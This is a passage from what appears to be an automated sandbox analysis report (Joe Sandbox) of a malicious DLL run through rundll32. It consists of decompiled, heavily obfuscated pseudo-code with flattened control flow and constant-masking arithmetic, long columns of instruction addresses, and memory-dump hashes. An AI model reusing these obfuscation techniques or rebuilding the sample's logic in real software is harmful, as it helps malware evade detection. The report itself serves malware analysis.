				_v1700 = _v1700 / _t429;
				_v1700 = _v1700 >> 0xe;
				_v1700 = _v1700 ^ 0x0006fa3f;
				_v1684 = 0x78d9c1;
				_v1684 = _v1684 * 0x25;
				_v1684 = _v1684 | 0x77a8ffeb;
				_v1684 = _v1684 ^ 0x77fd8a30;
				_v1656 = 0xa4e4c6;
				_v1656 = _v1656 + 0xa942;
				_v1656 = _v1656 + 0xffff73ad;
				_v1656 = _v1656 ^ 0x00a1f1ac;
				_v1652 = 0x64ed51;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 * 0x5c;
				_v1652 = _v1652 ^ 0x00034dfd;
				_v1580 = 0x83183a;
				_v1580 = _v1580 ^ 0x32eb2c8f;
				_v1580 = _v1580 ^ 0x326d5fbf;
				_v1564 = 0x95c9ec;
				_v1564 = _v1564 >> 6;
				_v1564 = _v1564 ^ 0x0008f372;
				_v1588 = 0xb1660f;
				_v1588 = _v1588 + 0x4492;
				_v1588 = _v1588 ^ 0x00bbacbc;
				_v1676 = 0x88aa71;
				_v1676 = _v1676 << 0xd;
				_v1676 = _v1676 | 0x03baa1bf;
				_v1676 = _v1676 << 6;
				_v1676 = _v1676 ^ 0xffa89651;
				_v1632 = 0x868f26;
				_v1632 = _v1632 << 1;
				_v1632 = _v1632 + 0xffffb6b3;
				_v1632 = _v1632 ^ 0x010eb46f;
				_v1640 = 0xd64df9;
				_v1640 = _v1640 >> 6;
				_t430 = 0x32;
				_v1640 = _v1640 / _t430;
				_v1640 = _v1640 ^ 0x000ccd63;
				_v1664 = 0x22c79e;
				_t431 = 0xf;
				_v1664 = _v1664 * 9;
				_v1664 = _v1664 << 0xa;
				_v1664 = _v1664 ^ 0x4da35e74;
				_v1664 = _v1664 ^ 0xa9bd4987;
				_v1696 = 0xf7f994;
				_v1696 = _v1696 >> 0xf;
				_v1696 = _v1696 << 7;
				_v1696 = _v1696 + 0xffff3f9d;
				_v1696 = _v1696 ^ 0x000a4602;
				_v1648 = 0xefbcda;
				_v1648 = _v1648 | 0xaae2c2a8;
				_v1648 = _v1648 + 0x86a3;
				_v1648 = _v1648 ^ 0xaafdd76e;
				_v1680 = 0x28593a;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 | 0x0bfc0be2;
				_v1680 = _v1680 + 0x55be;
				_v1680 = _v1680 ^ 0x0bf8c584;
				_v1596 = 0xd047d1;
				_v1596 = _v1596 | 0xaa1708a2;
				_v1596 = _v1596 ^ 0xaad8bb32;
				_v1604 = 0xf2c56f;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x3cb75693;
				_v1644 = 0x36719;
				_v1644 = _v1644 ^ 0x56bc0977;
				_t432 = 7;
				_v1644 = _v1644 / _t431;
				_v1644 = _v1644 ^ 0x05c6baf7;
				_v1672 = 0x1a4ba5;
				_v1672 = _v1672 << 2;
				_v1672 = _v1672 / _t432;
				_v1672 = _v1672 >> 2;
				_v1672 = _v1672 ^ 0x0008f53b;
				_v1628 = 0xe04a84;
				_v1628 = _v1628 | 0x71ddf7de;
				_v1628 = _v1628 + 0xd6a7;
				_v1628 = _v1628 ^ 0x71f84a11;
				_v1688 = 0xb42ba6;
				_t433 = 0x24;
				_v1688 = _v1688 / _t433;
				_v1688 = _v1688 | 0x51e7f8f6;
				_v1688 = _v1688 << 0xb;
				_v1688 = _v1688 ^ 0x3fc44495;
				_v1704 = 0x876d58;
				_v1704 = _v1704 + 0x4bbd;
				_v1704 = _v1704 ^ 0xe392f1ca;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 ^ 0x62a598c6;
				_v1636 = 0x545e02;
				_v1636 = _v1636 + 0xcb63;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 ^ 0x0aae6d2b;
				_v1612 = 0x26c885;
				_v1612 = _v1612 | 0x5f90e8de;
				_t434 = 0x66;
				_v1612 = _v1612 * 0x52;
				_v1612 = _v1612 ^ 0xa89ce640;
				_v1576 = 0x171d42;
				_v1576 = _v1576 ^ 0x4acb7e15;
				_v1576 = _v1576 ^ 0x4adecc08;
				_v1660 = 0xcbbc2;
				_v1660 = _v1660 >> 8;
				_v1660 = _v1660 / _t434;
				_v1660 = _v1660 ^ 0x3398a9eb;
				_v1660 = _v1660 ^ 0x33921795;
				_v1608 = 0x5e75bf;
				_v1608 = _v1608 + 0xa7f5;
				_v1608 = _v1608 >> 1;
				_v1608 = _v1608 ^ 0x002982b8;
				_v1584 = 0x10acd4;
				_v1584 = _v1584 + 0x75ec;
				_v1584 = _v1584 ^ 0x001a134d;
				_v1616 = 0x7387ff;
				_v1616 = _v1616 | 0x122d515f;
				_v1616 = _v1616 + 0xffffa5db;
				_v1616 = _v1616 ^ 0x12702e1c;
				L1:
				while(_t386 != 0x283f0d8) {
					if(_t386 == 0xc593167) {
						_push(_v1700);
						_push(_v1572);
						_push(0x2b10fc);
						_t361 = E002BAB66(_v1692, _v1620, __eflags);
						E002CC66E( &_v1560, __eflags);
						_t365 =  *0x2d520c; // 0x0
						_t367 =  *0x2d520c; // 0x0
						E002CBDB5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580, _t367 + 0x220, _v1564, _v1588, _t365 + 8,  &_v1560,  &_v1040, _t361);
						E002BAE03(_v1676, _v1632, _v1640, _t361);
						_t439 =  &(_t439[0x10]);
						L8:
						_t386 = 0xe92714c;
						continue;
					}
					if(_t386 == 0xd2f347e) {
						_push(_v1680);
						_push(_v1648);
						_push(0x2b121c);
						_t371 = E002BAB66(_v1664, _v1696, __eflags);
						E002CC66E( &_v1560, __eflags);
						_t373 =  *0x2d520c; // 0x0
						_t376 =  *0x2d520c; // 0x0
						__eflags = 0;
						E002B5F83(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560, _t376 + 0x220, _v1628,  &_v1040, _t373 + 8, _v1688, _t371);
						E002BAE03(_v1704, _v1636, _v1612, _t371);
						_t439 =  &(_t439[0x11]);
						goto L8;
					}
					if(_t386 == 0xe92714c) {
						_push(_v1616);
						_push(_v1584);
						_push(_v1608);
						_push(_t425);
						_push(_t425);
						_push(_v1660);
						_push(_t386);
						_push(_t425);
						__eflags = E002B9700( &_v520, _v1576, __eflags);
						_t425 =  !=  ? 1 : _t425;
					} else {
						if(_t386 != 0x3c91f62) {
							continue;
						} else {
						}
					}
					return _t425;
				}
				_push(_t386);
				E002BEA7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
				_t439 =  &(_t439[7]);
				_t386 = 0xc593167;
				goto L1;
			}





























































                                                                                                                      0x002c9190
                                                                                                                      0x002c9197
                                                                                                                      0x002c9199
                                                                                                                      0x002c919a
                                                                                                                      0x002c919b
                                                                                                                      0x002c919c
                                                                                                                      0x002c91a1
                                                                                                                      0x002c91ac
                                                                                                                      0x002c91af
                                                                                                                      0x002c91bc
                                                                                                                      0x002c91c7
                                                                                                                      0x002c91cc
                                                                                                                      0x002c91d4
                                                                                                                      0x002c91df
                                                                                                                      0x002c91e4
                                                                                                                      0x002c91ea
                                                                                                                      0x002c91f2
                                                                                                                      0x002c91fa
                                                                                                                      0x002c91fe
                                                                                                                      0x002c9203
                                                                                                                      0x002c9209
                                                                                                                      0x002c9211
                                                                                                                      0x002c921c
                                                                                                                      0x002c9223
                                                                                                                      0x002c9228
                                                                                                                      0x002c9231
                                                                                                                      0x002c923c
                                                                                                                      0x002c9244
                                                                                                                      0x002c924c
                                                                                                                      0x002c9251
                                                                                                                      0x002c9256
                                                                                                                      0x002c925e
                                                                                                                      0x002c9266
                                                                                                                      0x002c926e
                                                                                                                      0x002c9273
                                                                                                                      0x002c9278
                                                                                                                      0x002c9280
                                                                                                                      0x002c9288
                                                                                                                      0x002c928d
                                                                                                                      0x002c9295
                                                                                                                      0x002c929d
                                                                                                                      0x002c92a8
                                                                                                                      0x002c92b0
                                                                                                                      0x002c92bb
                                                                                                                      0x002c92c3
                                                                                                                      0x002c92cc
                                                                                                                      0x002c92cf
                                                                                                                      0x002c92d3
                                                                                                                      0x002c92d8
                                                                                                                      0x002c92e0
                                                                                                                      0x002c92ed
                                                                                                                      0x002c92f1
                                                                                                                      0x002c92f9
                                                                                                                      0x002c9301
                                                                                                                      0x002c9309
                                                                                                                      0x002c9311
                                                                                                                      0x002c9319
                                                                                                                      0x002c9321
                                                                                                                      0x002c9329
                                                                                                                      0x002c9333
                                                                                                                      0x002c9337
                                                                                                                      0x002c933f
                                                                                                                      0x002c934c
                                                                                                                      0x002c9357
                                                                                                                      0x002c9362
                                                                                                                      0x002c936d
                                                                                                                      0x002c9375
                                                                                                                      0x002c9380
                                                                                                                      0x002c938b
                                                                                                                      0x002c9396
                                                                                                                      0x002c93a1
                                                                                                                      0x002c93a9
                                                                                                                      0x002c93ae
                                                                                                                      0x002c93b6
                                                                                                                      0x002c93bb
                                                                                                                      0x002c93c3
                                                                                                                      0x002c93cb
                                                                                                                      0x002c93cf
                                                                                                                      0x002c93d7
                                                                                                                      0x002c93df
                                                                                                                      0x002c93e7
                                                                                                                      0x002c93f2
                                                                                                                      0x002c93f7
                                                                                                                      0x002c93fd
                                                                                                                      0x002c9405
                                                                                                                      0x002c9412
                                                                                                                      0x002c9415
                                                                                                                      0x002c9419
                                                                                                                      0x002c941e
                                                                                                                      0x002c9426
                                                                                                                      0x002c942e
                                                                                                                      0x002c9436
                                                                                                                      0x002c943b
                                                                                                                      0x002c9440
                                                                                                                      0x002c9448
                                                                                                                      0x002c9450
                                                                                                                      0x002c9458
                                                                                                                      0x002c9460
                                                                                                                      0x002c9468
                                                                                                                      0x002c9470
                                                                                                                      0x002c9478
                                                                                                                      0x002c947d
                                                                                                                      0x002c9485
                                                                                                                      0x002c948d
                                                                                                                      0x002c9495
                                                                                                                      0x002c94a0
                                                                                                                      0x002c94ab
                                                                                                                      0x002c94b6
                                                                                                                      0x002c94be
                                                                                                                      0x002c94c3
                                                                                                                      0x002c94cb
                                                                                                                      0x002c94d3
                                                                                                                      0x002c94e1
                                                                                                                      0x002c94e2
                                                                                                                      0x002c94e8
                                                                                                                      0x002c94f0
                                                                                                                      0x002c94f8
                                                                                                                      0x002c9505
                                                                                                                      0x002c9509
                                                                                                                      0x002c950e
                                                                                                                      0x002c9516
                                                                                                                      0x002c951e
                                                                                                                      0x002c9526
                                                                                                                      0x002c952e
                                                                                                                      0x002c9538
                                                                                                                      0x002c9544
                                                                                                                      0x002c9549
                                                                                                                      0x002c954f
                                                                                                                      0x002c955c
                                                                                                                      0x002c9566
                                                                                                                      0x002c956e
                                                                                                                      0x002c9576
                                                                                                                      0x002c957e
                                                                                                                      0x002c9586
                                                                                                                      0x002c958b
                                                                                                                      0x002c9593
                                                                                                                      0x002c959b
                                                                                                                      0x002c95a3
                                                                                                                      0x002c95a8
                                                                                                                      0x002c95b0
                                                                                                                      0x002c95b8
                                                                                                                      0x002c95c5
                                                                                                                      0x002c95c6
                                                                                                                      0x002c95ca
                                                                                                                      0x002c95d2
                                                                                                                      0x002c95dd
                                                                                                                      0x002c95e8
                                                                                                                      0x002c95f3
                                                                                                                      0x002c95fb
                                                                                                                      0x002c9606
                                                                                                                      0x002c960a
                                                                                                                      0x002c9612
                                                                                                                      0x002c961a
                                                                                                                      0x002c9622
                                                                                                                      0x002c962a
                                                                                                                      0x002c962e
                                                                                                                      0x002c9636
                                                                                                                      0x002c9641
                                                                                                                      0x002c964c
                                                                                                                      0x002c9657
                                                                                                                      0x002c965f
                                                                                                                      0x002c9667
                                                                                                                      0x002c966f
                                                                                                                      0x00000000
                                                                                                                      0x002c9677
                                                                                                                      0x002c9685
                                                                                                                      0x002c9748
                                                                                                                      0x002c974c
                                                                                                                      0x002c975b
                                                                                                                      0x002c9760
                                                                                                                      0x002c976e
                                                                                                                      0x002c9789
                                                                                                                      0x002c97a7
                                                                                                                      0x002c97c5
                                                                                                                      0x002c97dd
                                                                                                                      0x002c97e2
                                                                                                                      0x002c9741
                                                                                                                      0x002c9741
                                                                                                                      0x00000000
                                                                                                                      0x002c9741
                                                                                                                      0x002c9691
                                                                                                                      0x002c96a8
                                                                                                                      0x002c96ac
                                                                                                                      0x002c96b8
                                                                                                                      0x002c96bd
                                                                                                                      0x002c96ce
                                                                                                                      0x002c96d8
                                                                                                                      0x002c96ed
                                                                                                                      0x002c971f
                                                                                                                      0x002c9721
                                                                                                                      0x002c9739
                                                                                                                      0x002c973e
                                                                                                                      0x00000000
                                                                                                                      0x002c973e
                                                                                                                      0x002c9695
                                                                                                                      0x002c981f
                                                                                                                      0x002c9823
                                                                                                                      0x002c982a
                                                                                                                      0x002c982e
                                                                                                                      0x002c982f
                                                                                                                      0x002c9830
                                                                                                                      0x002c983b
                                                                                                                      0x002c983c
                                                                                                                      0x002c984f
                                                                                                                      0x002c9851
                                                                                                                      0x002c969b
                                                                                                                      0x002c96a1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c96a3
                                                                                                                      0x002c96a1
                                                                                                                      0x002c9860
                                                                                                                      0x002c9860
                                                                                                                      0x002c97ea
                                                                                                                      0x002c9810
                                                                                                                      0x002c9815
                                                                                                                      0x002c9818
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: 7ad28798e062714ce471641c68105b026c1529577938eef0f07933fb99bff7f7
                                                                                                                      • Instruction ID: 4b0167882df0556718d69ff8fae69de9a971716504ad68dde6fe174749180727
                                                                                                                      • Opcode Fuzzy Hash: 7ad28798e062714ce471641c68105b026c1529577938eef0f07933fb99bff7f7
                                                                                                                      • Instruction Fuzzy Hash: 30F101725183809FD368CF21C94AA9BFBE1FBC5748F10891DF29A96260C7B58919CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002D0D5B Relevance: 7.8, Strings: 6, Instructions: 286COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E002D0D5B() {
				void* _t279;
				signed char _t284;
				intOrPtr _t294;
				signed int _t296;
				signed int _t302;
				signed char _t309;
				intOrPtr _t310;
				void* _t311;
				signed short _t340;
				signed int _t341;
				intOrPtr _t342;
				signed int _t346;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed short* _t359;
				void* _t361;

				 *(_t361 + 0x80) =  *(_t361 + 0x80) & 0x00000000;
				 *(_t361 + 0x74) = 0x716487;
				_t302 = 0x4e9f10f;
				 *(_t361 + 0x78) = 0xba6397;
				 *(_t361 + 0x7c) = 0x705fb8;
				 *(_t361 + 0x68) = 0x4c092e;
				_t7 = _t361 + 0x68; // 0x4c092e
				_t349 = 5;
				 *(_t361 + 0x7c) =  *_t7 / _t349;
				 *(_t361 + 0x7c) =  *(_t361 + 0x7c) ^ 0x0003a2ba;
				 *(_t361 + 0x64) = 0x751de4;
				 *(_t361 + 0x64) =  *(_t361 + 0x64) + 0xffff6a51;
				 *(_t361 + 0x64) =  *(_t361 + 0x64) ^ 0x007ee7f9;
				 *(_t361 + 0x44) = 0x9fd9a3;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 6;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) << 4;
				 *(_t361 + 0x44) =  *(_t361 + 0x44) ^ 0x7f6c4ffb;
				 *(_t361 + 0x28) = 0x22a0e;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) >> 0xb;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) + 0x788;
				_t350 = 0x41;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) * 0x62;
				 *(_t361 + 0x28) =  *(_t361 + 0x28) ^ 0x000a9bb9;
				 *(_t361 + 0x20) = 0xda6f7f;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 0x62;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) * 7;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) << 0xa;
				 *(_t361 + 0x20) =  *(_t361 + 0x20) ^ 0x5b1b1cce;
				 *(_t361 + 0x74) = 0x2b9064;
				 *(_t361 + 0x74) =  *(_t361 + 0x74) + 0x7c5a;
				 *(_t361 + 0x74) =  *(_t361 + 0x74) ^ 0x002a32d7;
				 *(_t361 + 0x5c) = 0xcbc6c3;
				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) * 0x12;
				 *(_t361 + 0x5c) =  *(_t361 + 0x5c) ^ 0x0e5c6d3d;
				 *(_t361 + 0x40) = 0xfaf28f;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x36c89793;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) | 0x5dfe35bf;
				 *(_t361 + 0x40) =  *(_t361 + 0x40) ^ 0x7ff1266d;
				 *(_t361 + 0x3c) = 0x71501;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7d526c09;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) | 0x29ca113d;
				 *(_t361 + 0x3c) =  *(_t361 + 0x3c) ^ 0x7dd950c2;
				 *(_t361 + 0x78) = 0x2c4b29;
				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa68b4193;
				 *(_t361 + 0x78) =  *(_t361 + 0x78) ^ 0xa6a148a4;
				 *(_t361 + 0x50) = 0xa9eb43;
				 *(_t361 + 0x50) =  *(_t361 + 0x50) << 4;
				 *(_t361 + 0x50) =  *(_t361 + 0x50) ^ 0x0a966e12;
				 *(_t361 + 0x24) = 0xf29fdf;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) / _t350;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) | 0x702811c1;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0xfde5eea1;
				 *(_t361 + 0x24) =  *(_t361 + 0x24) ^ 0x8dc07913;
				 *(_t361 + 0x48) = 0x26e009;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xd6899262;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) << 1;
				 *(_t361 + 0x48) =  *(_t361 + 0x48) ^ 0xad52b6d6;
				 *(_t361 + 0x1c) = 0xb261a6;
				 *(_t361 + 0x1c) =  *(_t361 + 0x1c) + 0x753a;
				_t351 = 0x3f;
				 *(_t361 + 0x18) =  *(_t361 + 0x1c) / _t351;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xffffc68f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x00055965;
				 *(_t361 + 0x10) = 0xb29e6;
				 *(_t361 + 0x10) =  *(_t361 + 0x10) ^ 0xf1ef7176;
				_t352 = 0x53;
				_t346 =  *(_t361 + 0x80);
				 *(_t361 + 0x14) =  *(_t361 + 0x10) * 0x52;
				 *(_t361 + 0x14) =  *(_t361 + 0x14) + 0xffff3d5f;
				 *(_t361 + 0x14) =  *(_t361 + 0x14) ^ 0x7b287ee9;
				 *(_t361 + 0x6c) = 0xc2349f;
				_t359 =  *(_t361 + 0x80);
				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) * 0x2b;
				 *(_t361 + 0x6c) =  *(_t361 + 0x6c) ^ 0x209b01de;
				 *(_t361 + 0x30) = 0xecc1f5;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x10955a53;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) | 0x79713791;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) / _t352;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0x017289e0;
				 *(_t361 + 0x58) = 0x8daaf;
				_t353 = 0xe;
				 *(_t361 + 0x58) =  *(_t361 + 0x58) / _t353;
				 *(_t361 + 0x58) =  *(_t361 + 0x58) ^ 0x00025281;
				 *(_t361 + 0x54) = 0x82784e;
				 *(_t361 + 0x54) =  *(_t361 + 0x54) | 0x1fcf3d57;
				 *(_t361 + 0x54) =  *(_t361 + 0x54) ^ 0x1fc5386b;
				 *(_t361 + 0x2c) = 0xdcbbf5;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 0xa;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) >> 2;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) + 0xffff64c3;
				 *(_t361 + 0x2c) =  *(_t361 + 0x2c) ^ 0xfffe0972;
				 *(_t361 + 0x70) = 0xf032c2;
				 *(_t361 + 0x70) =  *(_t361 + 0x70) + 0xffff1f36;
				 *(_t361 + 0x70) =  *(_t361 + 0x70) ^ 0x00e5c56e;
				 *(_t361 + 0x38) = 0xb1df5b;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xe;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) << 0xa;
				 *(_t361 + 0x38) =  *(_t361 + 0x38) ^ 0x5b06c733;
				 *(_t361 + 0x18) = 0x22b4d7;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x9a622f3f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) + 0xcb3c;
				_t354 = 0x1f;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) / _t354;
				 *(_t361 + 0x18) =  *(_t361 + 0x18) ^ 0x04f5d5b3;
				 *(_t361 + 0x34) = 0xa6176b;
				_t355 = 0x3b;
				 *(_t361 + 0x30) =  *(_t361 + 0x34) / _t355;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) >> 0xb;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) + 0xffffd9a6;
				 *(_t361 + 0x30) =  *(_t361 + 0x30) ^ 0xfffb162a;
				while(1) {
					L1:
					L2:
					while(1) {
						while(_t302 != 0xb6d0a5) {
							if(_t302 == 0x1c75f00) {
								_push(_t302);
								_push(_t302);
								_t311 = 0x68;
								_t359 = E002C3512(_t311);
								__eflags = _t359;
								if(__eflags != 0) {
									_t302 = 0xb6d0a5;
									goto L17;
								}
							} else {
								if(_t302 == 0x4e9f10f) {
									_t342 =  *0x2d5214; // 0x0
									_t302 = 0x8016e2b;
									_t341 = _t342 + 4;
									goto L12;
								} else {
									if(_t302 == 0x6570a92) {
										_t294 =  *0x2d5214; // 0x0
										_t302 = 0xe9e8905;
										 *_t341 = _t359;
										_t212 =  &(_t359[0x2c]); // 0x58
										_t341 = _t212;
										_t213 = _t294 + 0x44;
										 *_t213 =  *(_t294 + 0x44) + 1;
										__eflags =  *_t213;
										L12:
										 *(_t361 + 0x5c) = _t341;
										goto L13;
									} else {
										if(_t302 == 0x8016e2b) {
											_t296 = E002CEAE6(0x2d5000,  *((intOrPtr*)(_t361 + 0x88)), __eflags,  *(_t361 + 0x6c),  *(_t361 + 0x48), _t361 + 0x84,  *(_t361 + 0x24));
											_t361 = _t361 + 0x10;
											 *(_t361 + 0x7c) = _t296;
											_t346 = _t296;
											_t302 = 0x1c75f00;
											 *(_t361 + 0x64) = _t296 +  *(_t361 + 0x80);
											goto L1;
										} else {
											if(_t302 == 0x8020f8f) {
												E002B68DE( *(_t361 + 0x78),  *(_t361 + 0x40),  *(_t361 + 0x1c),  *(_t361 + 0x34),  *(_t361 + 0x7c));
											} else {
												if(_t302 != 0xe9e8905) {
													L19:
													__eflags = _t302 - 0x718ec4e;
													if(__eflags != 0) {
														L17:
														_t341 =  *(_t361 + 0x5c);
														L13:
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t302 = (_t302 & 0xf9c54f71) + 0x8020f8f;
													continue;
												}
											}
										}
									}
								}
							}
							_t310 =  *0x2d5214; // 0x0
							 *(_t310 + 0x38) =  *(_t310 + 0x38) & 0x00000000;
							 *((intOrPtr*)(_t310 + 0x3c)) =  *((intOrPtr*)(_t310 + 4));
							__eflags = 1;
							return 1;
						}
						_push( *((intOrPtr*)(_t361 + 0x4c)));
						_push( *(_t361 + 0x78));
						 *((char*)(_t361 + 0x53)) =  *((intOrPtr*)(_t346 + 1));
						_push(0x2b134c);
						 *(_t361 + 0x56) =  *((intOrPtr*)(_t346 + 2));
						_t279 = E002BAB66( *(_t361 + 0x44),  *(_t361 + 0x40), __eflags);
						_t231 =  &(_t359[0x10]); // 0x20
						_push(_t279);
						E002CBDB5(_t231, __eflags, 0x10,  *(_t361 + 0x54),  *(_t361 + 0x74),  *(_t361 + 0x44),  *(_t361 + 0x38),  *(_t361 + 0x56) & 0x000000ff,  *((intOrPtr*)(_t361 + 0x88)),  *(_t361 + 0x48),  *(_t361 + 0x63) & 0x000000ff,  *(_t346 + 3) & 0x000000ff,  *(_t346 + 3) & 0x000000ff);
						E002BAE03( *((intOrPtr*)(_t361 + 0x94)),  *((intOrPtr*)(_t361 + 0x90)),  *(_t361 + 0x64), _t279);
						_t361 = _t361 + 0x40;
						 *_t359 = ( *(_t346 + 4) & 0x000000ff) << 0x00000008 |  *(_t346 + 5) & 0x000000ff;
						_t284 =  *((intOrPtr*)(_t346 + 6));
						_t309 =  *((intOrPtr*)(_t346 + 7));
						_t346 = _t346 + 8;
						_t302 = 0x6570a92;
						_t340 = (_t284 & 0x000000ff) << 0x00000008 | _t309 & 0x000000ff;
						__eflags = _t340;
						_t359[0x28] = _t340;
						goto L19;
					}
				}
			}
























                                                                                                                      0x002d0d61
                                                                                                                      0x002d0d6b
                                                                                                                      0x002d0d73
                                                                                                                      0x002d0d78
                                                                                                                      0x002d0d80
                                                                                                                      0x002d0d88
                                                                                                                      0x002d0d90
                                                                                                                      0x002d0d9a
                                                                                                                      0x002d0d9f
                                                                                                                      0x002d0da5
                                                                                                                      0x002d0dad
                                                                                                                      0x002d0db5
                                                                                                                      0x002d0dbd
                                                                                                                      0x002d0dc5
                                                                                                                      0x002d0dcd
                                                                                                                      0x002d0dd2
                                                                                                                      0x002d0dd7
                                                                                                                      0x002d0ddf
                                                                                                                      0x002d0de7
                                                                                                                      0x002d0dec
                                                                                                                      0x002d0df9
                                                                                                                      0x002d0dfc
                                                                                                                      0x002d0e00
                                                                                                                      0x002d0e08
                                                                                                                      0x002d0e15
                                                                                                                      0x002d0e1e
                                                                                                                      0x002d0e22
                                                                                                                      0x002d0e27
                                                                                                                      0x002d0e2f
                                                                                                                      0x002d0e37
                                                                                                                      0x002d0e3f
                                                                                                                      0x002d0e47
                                                                                                                      0x002d0e54
                                                                                                                      0x002d0e58
                                                                                                                      0x002d0e60
                                                                                                                      0x002d0e68
                                                                                                                      0x002d0e70
                                                                                                                      0x002d0e78
                                                                                                                      0x002d0e80
                                                                                                                      0x002d0e88
                                                                                                                      0x002d0e90
                                                                                                                      0x002d0e98
                                                                                                                      0x002d0ea0
                                                                                                                      0x002d0ea8
                                                                                                                      0x002d0eb0
                                                                                                                      0x002d0eb8
                                                                                                                      0x002d0ec0
                                                                                                                      0x002d0ec5
                                                                                                                      0x002d0ecd
                                                                                                                      0x002d0edd
                                                                                                                      0x002d0ee1
                                                                                                                      0x002d0ee9
                                                                                                                      0x002d0ef1
                                                                                                                      0x002d0ef9
                                                                                                                      0x002d0f01
                                                                                                                      0x002d0f09
                                                                                                                      0x002d0f0d
                                                                                                                      0x002d0f15
                                                                                                                      0x002d0f1d
                                                                                                                      0x002d0f29
                                                                                                                      0x002d0f2c
                                                                                                                      0x002d0f30
                                                                                                                      0x002d0f38
                                                                                                                      0x002d0f42
                                                                                                                      0x002d0f4a
                                                                                                                      0x002d0f59
                                                                                                                      0x002d0f5c
                                                                                                                      0x002d0f63
                                                                                                                      0x002d0f67
                                                                                                                      0x002d0f6f
                                                                                                                      0x002d0f77
                                                                                                                      0x002d0f84
                                                                                                                      0x002d0f8b
                                                                                                                      0x002d0f8f
                                                                                                                      0x002d0f97
                                                                                                                      0x002d0f9f
                                                                                                                      0x002d0fa7
                                                                                                                      0x002d0fb7
                                                                                                                      0x002d0fbb
                                                                                                                      0x002d0fc3
                                                                                                                      0x002d0fcf
                                                                                                                      0x002d0fd4
                                                                                                                      0x002d0fda
                                                                                                                      0x002d0fe2
                                                                                                                      0x002d0fea
                                                                                                                      0x002d0ff2
                                                                                                                      0x002d0ffa
                                                                                                                      0x002d1002
                                                                                                                      0x002d1007
                                                                                                                      0x002d100c
                                                                                                                      0x002d1014
                                                                                                                      0x002d101c
                                                                                                                      0x002d1024
                                                                                                                      0x002d102c
                                                                                                                      0x002d1034
                                                                                                                      0x002d103c
                                                                                                                      0x002d1041
                                                                                                                      0x002d1046
                                                                                                                      0x002d104e
                                                                                                                      0x002d1056
                                                                                                                      0x002d105e
                                                                                                                      0x002d106a
                                                                                                                      0x002d106f
                                                                                                                      0x002d1075
                                                                                                                      0x002d107d
                                                                                                                      0x002d1089
                                                                                                                      0x002d108c
                                                                                                                      0x002d1090
                                                                                                                      0x002d1095
                                                                                                                      0x002d109d
                                                                                                                      0x002d10a9
                                                                                                                      0x002d10a9
                                                                                                                      0x00000000
                                                                                                                      0x002d10ad
                                                                                                                      0x002d10ad
                                                                                                                      0x002d10bf
                                                                                                                      0x002d1189
                                                                                                                      0x002d118a
                                                                                                                      0x002d118d
                                                                                                                      0x002d1193
                                                                                                                      0x002d1197
                                                                                                                      0x002d1199
                                                                                                                      0x002d119f
